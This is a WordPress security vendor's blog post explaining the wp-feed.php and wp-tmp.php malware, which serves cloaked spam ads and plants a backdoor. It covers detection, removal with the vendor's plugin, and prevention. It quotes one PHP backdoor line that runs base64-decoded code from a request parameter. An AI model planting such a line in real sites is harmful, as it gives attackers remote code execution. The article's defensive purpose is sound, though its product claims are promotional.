How to Fix wp-feed.php & wp-tmp.php Malware in WordPress?

Mar 2, 2020

How to Fix wp-feed.php & wp-tmp.php Malware in WordPress?

Mar 2, 2020

Are your visitors complaining about spam ads on your WordPress website but you don’t see any? Is your malware scanner alerting you that “your site is hacked” but it looks fine to you? Did you know that a hacker can hide the hack from you? Hackers find clever ways to disguise their hacks from site owners so that it goes undetected for a long time. Two common and well-disguised hacks are the wp-feed.php hacks and the wp-tmp.php hack.

Under these kinds of hacks, your site displays ads for illegal products, drugs, adult content to your visitors (read – pharma hack), insert backdoors among other things.

As the hack is hidden from you, it tends to stay active on your site for a long time before you discover it. There are high chances Google will detect it before you do. If they find malware, they’ll blacklist your site immediately to protect their users. Next, your web host will be quick to suspend your account to safeguard their own interests.

These repercussions will take a severe toll on your website and your business. Luckily, there’s are ways to fix these types of hacks and get your website back to normal.

In this guide, we’ll explain what the wp-feed and wp-tmp hacks are and show you steps to remedy and prevent them.

TL;DR – Our MalCare Security Plugin is designed to identify and remove the wp-feed and wp-tmp hacked files even if they’re disguised or hidden. After you install the plugin, MalCare will scan and find the files. The plugin will also help you clean your site in under a few minutes and get back to business.


What Is Wp-tmp.php?

When your WordPress website is getting a sizable amount of traffic, displaying ads on your site can bring in good revenue. But this factor also makes it susceptible to the wp-feed hack.

In this wp-feed.php hack, the attack will hijack your ads and post content of their choice. This usually means your visitors would see obscene ads for adult content or illegal drugs. The hacker could also change a feature image on the current post a visitor is looking at. However, when you visit your website, it looks normal.

How is it hidden from you but not from the visitors? This is where the wp-feed.php file comes in. The file records the IP address of every user of the website. When a visitor comes to the website, it checks the IP against its record. If the visitor is a user, then the file shows him/her the usual clean content. If it’s not a user, then the file identifies this as a custom feed and displays custom content.

Hackers create a wp-tmp.php file to install a backdoor on your site. By using this WordPress file, hackers can access your website and inject malware any time they want. If you clean your website of the malware and don’t remove the wp-tmp.php file, you can be sure that your site will be hacked again soon. A wp-tmp WordPress file may look like the following code:


$p = $REQUEST$#91;”m”&#93;; eval(base64_decode ($p));


If you suspect you’ve been hacked, you can scan your site to confirm your doubts.


How To Scan Your WordPress Website For Wp-feed And Wp-tmp Files

You can scan your WordPress site for hacked files in two ways – manually or by using a plugin. We’ll explain both.

Manually Cleaning Your Hacked WordPress Website

To scan your site manually, you need to access your WordPress files. Access your WordPress hosting account. Next, log in to cPanel > File Manager.

file manager public html file

Here, navigate to public_html. You can look for wp-feed.php files and wp-tmp.php files using the search option. Once you locate these files, you can simply delete them.

We DON’T RECOMMEND this method because it is proven to be ineffective in many cases. Every time the code in these WordPress files is executed, it creates a new malware code in other files. It’s a complex hack and can infect several files. Next, hackers code in such a way that every time someone visits your site, the file can reappear. If you want to have any shot at fixing your site, you need to make sure no one visits your site while you clean it.

Hackers also make it extra difficult to clean it manually by changing the location of these WordPress files. This method can be frustrating because after cleaning it multiple times, you’ll find that your site is still hacked.

To get rid of such complex hacks, it’s best to use Website Security Services like MalCare. Let’s take a look at how it works.

Automatically Cleaning Your Hacked Website With MalCare

As we discussed earlier, the wp-feed attack is complicated. The reasons we recommend using MalCare are aplenty:

    • MalCare is a security plugin that was designed by studying over 240,000 WordPress sites. It’s built on technology that is guaranteed to work and can clean your site instantly.
    • Many plugins available usually check for commonly detected malware and miss any new kind of malware. MalCare analyzes the behavior of code. In doing so, it can find new, hidden and disguised malware as well.
    • Many plugins give you surface scans. But with the wp-feed attack, you need a plugin that will run a deep scan of your entire website. MalCare does just that. It combs through all your website’s files, folders, and the database.
    • It also identifies backdoors such as the wp-tmp.php file and helps you get rid of them.

Note: Hackers may use the same coding of wp-feed and wp-tmp and rename the file as something else. This makes it harder to find manually but not with MalCare. The plugin will find the malware regardless of the file name.

How To Use MalCare To Clean The Wp-Feed.php Hack

Cleaning your website with MalCare can be done in three easy steps:

Step 1: Activate the Plugin

Install MalCare on your WordPress website. You can do this directly from the MalCare website or from the WordPress repository.

Step 2: Scan your Site

You can scan your website for free with MalCare. From your WordPress dashboard, select MalCare > Malware Scan and click on scan.

malcare malware scan

Step 3: Clean your WordPress Site

Once MalCare detects the hacked files, you’ll see an alert like so:

malcare hacked files found

Click on Auto-Clean to clean your site. The plugin will start the cleaning process and your site will be clean in under a few minutes.

You can rest assured that you’re rid of the hack and any backdoors that were present on your website.

Note: If you see an ‘Upgrade’ option instead of ‘Auto-clean’, you need to sign up for a MalCare plan. Malware removal is a premium service with all plugins because it is complex and requires a lot of work.


How to Prevent the Wp-Feed.php and Wp-Temp.php hack?

There are various ways of preventing the wp-feed and wp-temp hack. We’ll touch upon the most effective ones:

    • Use a WordPress Security Plugin

Always keep a website security plugin like MalCare active on your site. It will scan your website every day. It puts up a strong firewall to block hackers and malicious traffic from visiting your site. Plus, if there’s any suspicious activity on your site, MalCare will alert you and you can fix it instantly with the help of the plugin.

    • Implement WordPress Hardening Measures on Your Site recommends certain hardening measures that will make it much more difficult for hackers. These include using strong passwords, resetting the login credentials for all users, and disabling plugin installation. Follow our guide on WordPress Hardening to implement it on your site.

    • Never Install Nulled Themes and Plugins

Nulled software is another word for pirated software. These nulled themes and plugins give you access to premium features free of cost. But there’s always a price. These elements are contaminated with malicious code. Once you install the nulled theme or plugin on your site, the malware is activated and infects your website. This is one of the most common reasons for wp-feed attacks. If you’re using such software, delete it immediately and vow never to use it again.

Use plugins from that are listed in the WordPress plugins directory or premium ones you can trust. The same applies to WordPress themes.

    • Always Keep Your WordPress Site Updated

Another reason why these hacks occur is because of outdated themes and plugins. Working in the WordPress realm for more than a decade, we’ve seen how vulnerabilities appear in themes and plugins over time. In most cases, developers are quick to fix it and release a security patch in an updated version.

You’ll usually see a prompt on your dashboard to update your software or they’ll notify you by mail. Once you update your plugin/theme, the vulnerability will be fixed. But if you choose to ignore it, then you become an easy target for hackers. Always keep your WordPress installation and its themes and plugins updated. Check out our detailed guide on How To Safely Update Your Site.


Final Thoughts

Cleaning the wp-feed.php hack can be an easy task or nightmare depending how you choose to resolve the problem – manually or using a plugin.

Remember, the longer the hacked files remain on your site, the greater the impact becomes! If you want to remove the files immediately, then it’s best to use a plugin.

That said, not all plugins can clean your website immediately. MalCare is one of the only plugins available that enables you to clean your site automatically and instantly without long waiting times. Plus, once your WordPress site is clean, the plugin will continue to protect your site. You needn’t worry that your site will be hacked again! For more information you can check our guide on how to protect your website from hackers.

Try Our MalCare WordPress Security Plugin Now!


Share via
Copy link